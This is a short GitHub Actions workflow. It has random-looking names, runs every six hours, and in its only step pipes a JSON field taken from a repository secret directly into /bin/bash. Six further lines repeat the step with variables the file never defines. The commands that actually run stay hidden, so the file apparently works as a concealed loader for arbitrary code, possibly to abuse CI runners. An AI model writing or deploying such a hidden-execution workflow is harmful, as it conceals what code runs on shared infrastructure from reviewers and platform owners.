name: lujingtian6152
on:
  workflow_dispatch:
  schedule:
    - cron: '36 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: lujingtian6152
        env:
          syhuz60: ${{ secrets.syhuz60 }}
        run: |
          echo $syhuz60 | jq -r .fqqzf9 | /bin/bash
          echo $ncagg37 | jq -r .vb38516 | /bin/bash
          echo $hpa2252 | jq -r .gz43113 | /bin/bash
          echo $rdra8 | jq -r .oep77 | /bin/bash
          echo $vl766 | jq -r .h4 | /bin/bash
          echo $l224 | jq -r .hpwfc20 | /bin/bash
          echo $ame022 | jq -r .z1 | /bin/bash

